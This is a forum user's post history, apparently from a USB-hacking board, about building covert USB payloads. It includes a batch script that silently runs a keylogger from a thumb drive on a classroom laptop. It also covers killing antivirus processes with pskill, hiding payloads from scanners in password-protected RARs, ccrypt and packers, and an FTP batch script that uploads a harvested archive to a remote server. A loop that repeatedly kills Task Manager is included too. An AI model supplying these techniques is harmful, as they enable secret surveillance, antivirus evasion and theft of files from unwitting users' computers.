sc0rpi0
-
Posts
138 -
Joined
-
Last visited
Posts posted by sc0rpi0
-
-
Is it possible to set up something like remote access
but so that files can *only* be read and viewed remotely? So that nothing can be modified.
Thanks.
-
Recently, I tried to connect to my computer via psexec.
I used this command:
psexec machinename[external ip] cmd.exe
I received the notice that I must
"Make sure that the default admin$ share is enabled on [my machinename]"
Any suggestions on how to go about doing this? What does this do?
Preferably through command line--not gui.
Much appreciated.
-
-
Some AV products have random names for their scanning, so looking for process names may not help in some situations.
True; however, it may be as simple as searching for default installation directories such as "C:Program Files" or even the registry.
Side bar: Has anyone tried to end AV processes by using the taskkill /t (which kills child processes as well)? Currently not running any AV on my VM for packing reasons for this app...
Yes, that is a good idea. Unfortunately, I wouldn't be the one to ask.
Although "taskill /t" may work, I would recommend using pskill from sysinternals.
I wonder...would this killing of child processes do the trick? [thinking outloud]
Not only can it kill child processes, but system processes as well.
-
Some AV products have random names for their scanning, so looking for process names may not help in some situations.
This method has been tested with mcafee and it works.
Exactly which anti virus products are you referring to?
-
I'm a newb, I've read previous posts, but I still can't get a keylogger to auto run of my thumb drive. Like I said its a u3 enabled, cruzer micro 1gb drive. I'm confused about the scripts, finding a free keylogging program to run from the script, and saving the script to the u3 file system. If someone could post step by step instructions that would be great! Thanks! (Do I need a script or do I use the u3 script).
I've been told I need to modify the read-only "CDROM" division of a U3 drive to read and write access. How can this be done?
A user from the binary revolution forum gave this link. I'm kinda confused on the instructions so if someone could make it simpler for me that would be great! hxxp: mcgrewsecurity. com/research/hackingU3/
Can this be done without the user knowing or having to open anything. I want to be able to plug this in, have it run in the background, and record key strokes when I'm not in the class room.
Edit-- In case your wondering the reason, we're having a problem with kids using the media laptop to check myspace at school and its really annoying and hard to catch them. I'm only in the room maybe 1 or 2 periods a day so its really hard to keep any eye on it. It is the only laptop in the entire school that has admin privileges on the network firewall. On occasion we use a clip or two from youtube or myspace in the monthly video we produce. This is not malicious in any way!!! (I don't know the forum rules yet). I eventually want to publish a simple walk through for hacking the u3 if it hasn't been done.
P.s. This like is NOT helpful. Where is the "step 2" zip file it mentions??? http://wiki.hak5.org/wiki/Sandisk_U3_ISO_Hack
Unfortunately, I don't have a u3. This is how I would do it with a non-u3 drive.
This uses pskill from sysinternals.
Make a file called file.txt in the root directory of your flash drive.
Don't have anything install on the computer except this batch file in some random system directory.
Then have it launch.
Make sure that the keylogger runs *without* installing anything on the target computer.
Have a batch file like this run upon autorun:
start.bat
[your keylogger executable]
call check.bat
exit
check.bat
:begin
if exist "%~d0file.txt" goto begin
pskill.exe -t "[keylogger process]"
exit
Sorry this reply is so brief.
I am making the assumption that you know how to make batch files.
Good luck!
-
Interesting, but that doesnt get past the fact that you need to actually run the executables. Using a rar for temporary storage will be nice, but how will that help getting around running the apps?
The plan is that the nasties [switchblade apps that avs don't like] will be hidden from detection.
Before the nasties are extracted, a batch file or another executable will be run, hopefully killing the av.
I am currently compiling the list of av processes and will probably post that sometime during winter break.
However, I will may need a little assistance because google doesn't find all av processes.
-
I'd just like to say that password protected rar's also don't get detected by anti viruses, I'd consider using rar's since they are more widely used but it's up to you.
Thanks for the fantastic suggestion.
I just tried it and it veils the files from any av intervention.
Thanks again for the idea.
-
I've been reading this thread continuously hoping for a solution. It wasn't until I finally took some initiative that I may have figured out a solution.
I tested this on XP SP2 running Symantic AV with definition files current as of 12/14/2007.
On a different box, I used ccrypt to encrypt the files. This renames the files to <program>. exe. cpt. This successfully passed Symantec scan's.
I'm hacking some c++ now which will follow this paradigm:
-Scan computer for known AV
-If AV present, try to kill the process
-If kill successful, decrypt payload
-Run payload & encrypt files back
Let me know what you think. Once I have some time to get a VM up and running, I'll test ccrypt with other AV's. As far as I know though, this should work against all signature based ones. . .
That is a good idea...don't mean to steal your idea, but I have been working on a huge list of
av and firewall processes to kill also . It's nearly done and will probably be posted on the usb hacks forum soon.
I will consider using this ccrypt ...it looks interesting. Could you please post the commands for what you are trying to do?
Keep up the good work! :)
Thanks for taking the initiative. Please post any new results so that we may become equally enlightened.
Thanks again.
-
So has anybody got this going?
Good question.
I am currently on my non-hacking computer.
I know it sounds odd, but I have a separate computer for testing even safe software [being the paranoid person I am]
It will probably be down until somewhere in winter break :( Sorry if this causes anyone any inconvenience.
Once it's fixed, I'll test the packaging tools and reply on this topic.
Eventually, it should show up in your "Show new replies to your posts" tab thing.
If any one else would like try, please go right ahead. If it's not too much trouble, post your results here.
For test binding purposes, I would recommend trying "pspv.exe" in the switchblade usb package. My av goes nuts when I unzip this.
Or another that your av would typically pick up without binding.
Good luck!
-
As it has already been said, if you pack/crypt an exe your AV might detect it by general detection of the cryptor. So you need a private packer. :-?
As private means NOT public there are no links :D
But you can also try one of the public known packers, like Yoda's Protector
Is this better than UPX or iexpress [all windows come with this--just type "iexpress" into run box]?
Thanks very much.
-
Gmail:
"Over 5782.718985 megabytes (and counting) of free storage so you'll never need to delete another message."
Thats 5.6 gigs if I don't totally suck at math.
http://yodel.yahoo.com/2007/03/27/yahoo-ma...ity-and-beyond/
Yahoo has unlimited email storage, let me know when you can find an ftp that offers more that unlimited...
Just on the side, you really need to pay more attention to the Internet.
Less secure = htacsess - how do you get the files there in the first place? I haven't done things through ftp in a while, but last I checked, to upload a file someone needs to have the login info. Which means you have to leave that info somewhere on the pc. For email, all you need is a 'to' address, you can send through a throwaway account.
I suppose you are right.
Personally, I don't care about people's videos and pictures.
So, I only filter out them leaving only textfiles and word documents.
Usually 250 mb is enough for these.
Just my personal preference.
Automatic ftp can be done with merely a .bat file and a .txt file.
And yes, leaving the username and password is necessary.
Really simple. Here is how it's done:
[bATCH FILE]
ftp -s:send.txt
[TEXT FILE- called send.txt]
open [ftp.yourserver.com]
[username]
[password]
binary
prompt n
put "archive.rar"
bye
Still, I guess email *is* more secure and harder to trace.
Thanks.
-
-
Hi,
How can i modify usb hacksaw to copy certain files ?
I want it to copy and send only ( . doc ) files . .
Thank you.
If you want a tutorial, here's a good one.
http://www.usbhacks.com/2006/10/29/how-to-...sb-flash-drive/
If you just want the example files, download the "Demo Source Files" which can be accessed
in a gray box near the title [centered right].
Just incorporate the commands into go.bat.
If you have any questions, ask.
Good Luck!
-
Thanks so much for the help.
-
stop and think...
do you want to send the mail out or do you want to get the mail in?
and remember the account you use will have the name and password in plaintext so if anyone finds the files they'll have all the account infomation
I just tried both. Neither worked.
All my account information is correct. My firewall is set up to allow blat and stunnel to internet access.
Any suggestions?
-
get yourself a private packer/crypter, and your problems are solved ;)
Where do I pick up one of these?
I am presuming that when you say "private" you mean secret: not open to the public.
If so, then my previous question was very pointless. Ignore it then.
There aren't many of these around are there are there? Even if I manage to find one, how do I know it won't backfire?
I know I'm paranoid but don't I have a reason to be?
Thanks.
-
Why doesn't hacksaw use ftp instead of email to deliver the contents of usb drives?
More space, faster, and more hidden.
-
Is there a wildcard which represents all drives [hard drive and all removable]?
Thanks.
-
Here's something interesting:People at SecuriTeam (http://www.securiteam.com) has found a simple way to bypass the virus checking capability of several popular AntiViruses. The method is as simple as it can get. Just rename the Virus infected file in such a way that it should contain non-printable ASCII characters.
Several AVs fail to open/test this file as they can not handle the non-printable ASCII in the filenames.
Several AntiVirus programs do not scan filesnames that contain non-printable ASCII characters, in addition instead of blocking them they are simply ignored.
Details
Vulnerable Systems:
* BitDefender Antivirus
* Trustix Antivirus
* Avast! Antivirus
* Cat Quick Heal Antivirus
* Abacre Antivirus
* VisNetic Antivirus (bypass only with manual scan)
* AntiVir Personnal Edition Antivirus
* Clamav for Windows Antivirus
* Antiy Ghostbusters Professional Edition
Immune Systems:
* Kaspersky Antivirus
* AVG Free
Several AntiVirus programs do not scan files that contain extended ASCII characters and characters that are lower than 0x20. An attacker can rename a malicious filename to such a filename which in turn will cause the AntiVirus programs to ignore the filename.
Full info:- http://www.securiteam.com/windowsntfocus/5TP0M2KGUQ.html
Not all major AVs are tested there, but you can test your AV for yourself. Get the Eicar test pattern file and rename the file so that it contains a Non-printable ASCII character.
For example, if xyz.exe if the filename then you can use xyz[ALT+1].exe, pressing ALT+number would get an ASCII character.
Get Eican test virus here:- http://www.eicar.org/anti_virus_test_file.htm
Taken from http://www.techspot.in/forum/archive/index.php?t-1872.html
Thanks.
This seems to work...sort of...only with some executables.
I am currently looking for a solution to veil executables from the larger AV's such as Norton and Mcafee.
Maybe "encrypt" was not the correct word.
What I am trying to do is package a file so that the contents can be ran but not detected.
I have tried upx and iexpress and managed to hide a file from av but not when it is being run. :(
Any more ideas?
Thanks.
-
nope that's you're server you can/should change it to googles
I know this maybe a very stupid question, but what is google's mail server?
I very new to sending mail outside the nice gmail interface.
An even more obvious question: would it be the incoming or outgoing server? I think its the outgoing, but am not entirely sure.
the two servers are these I believe:
incoming: pop.gmail.com
outgoing: smtp.gmail.com
Much appreciated.
-
In part of the hacksaw, the blat command:
-server 127.0.0.1:1099
is in the send.bat.
What server is 127.0.0.1:1099?
Is this gmail's server?
Thanks very much.
-
Instead of emailing .rar parts, just have it setup an ftp that shares his whole harddrive. Then login later and browse at your leisure.
Do you mean upload the entire hardrive? Probably not, because this would take forever.
Is there another way of doing this via ftp?
-
In order per question mark:
The u3 launchpad is the software that lets you run programs from the u3 start menu. Its important to have if you log onto domain account frequently, sometimes the computer will not create both partitions of the drive and by double clicking the cd shaped U3 launchpad, you can spawn the flash (writable) partition of the drive.
All the crappy software.
No, probably not. To the best of my knowledge uninstalling launchpad removes the cd partition.
You can't :P. And honestly, theres no reason to uninstall it, its only a couple megs out of 2-4 gigs. You can uninstall all of the programs that come with it (through the launchpad menu) and tell it not to load automatically though.
If you merely insert the drive and have the launchpad off, no, besides the fact that windows configures drivers for every flash drive you ever plug in.
N/A
Sandisks are nice, the 4 gig cruzer mini looks really good right now. You could if you wanted to, hypothetically speaking of course, install full apps like Photoshop and Office, assuming of course that you own them and the license permits it. Flash them to the u3 partition and you're all set.
I actually just bought a new 4 gig cruzer mini for that purpose, Office 2007 and Photoshop/dreamweaver :-P.
Thanks for your last response. It answered a lot of my questions.
The reason why I was wondering about the automatic launching of programs is the switchblade/or hacksaw.
I've always wanted to test out the u3 version but haven't been able to.
Do I need to install a different launchpad for this purpose? Is it possible to get back my old launchpad after testing the switchblade launchpad?
Much appreciated.
Disabling Ctrl+Alt+Del/Taskmgr
in USB Hacks
Posted
My method is kind of ghetto, but it works well.
make a batch file like this with pskill. Have it launched using nircmd with this command: nircmd execmd [batch file name]
:begin
pskill -t "TASKMGR.EXE"
:goto begin